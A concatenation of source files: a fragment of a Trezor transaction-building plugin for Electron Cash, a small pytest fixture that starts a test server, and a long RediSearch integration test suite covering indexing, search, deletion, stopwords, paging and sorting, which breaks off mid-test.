multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address.to_script()[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address.to_full_ui_string()
outputs.append(txoutputtype)
return outputs
def electroncash_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electroncash_tx_to_txtype(tx)
|
conftest.py
|
from . import server
import pytest
from threading import Thread
@pytest.fixture(scope='module', autouse=True)
def server_setup():
instance = server.create_server()
process = Thread(target=instance.serve_forever)
process.setDaemon(True)
process.start()
|
test.py
|
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
def testAdd(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
env.assertTrue(r.exists('idx:idx'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
for _ in r.retry_with_rdb_reload():
prefix = 'ft'
env.assertExists(prefix + ':idx/hello')
env.assertExists(prefix + ':idx/world')
env.assertExists(prefix + ':idx/lorem')
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
print r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx', 'schema',
'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello')
env.assertTrue(len(res) == 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(isinstance(res[2], list))
env.assertTrue('title' in res[2])
env.assertTrue('hello another world' in res[2])
env.assertEqual(res[3], "doc1")
env.assertTrue('hello world' in res[4])
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertEqual(res[2], "doc1")
# Test searching WITHSCORES
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[4], "doc1")
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[3], "doc1")
env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
# Check to see what happens when we try to return unsaved documents
env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
# Add 3 documents
for x in range(3):
env.cmd('ft.add', 'idx', 'doc{}'.format(x),
1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
# Now query the results
res = env.cmd('ft.search', 'idx', 'value')
env.assertEqual(3, res[0])
for content in res[2::2]:
env.assertEqual([], content)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
'schema', 'foo', 'text'))
for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test taken from Java's test suite
env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertGreater(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
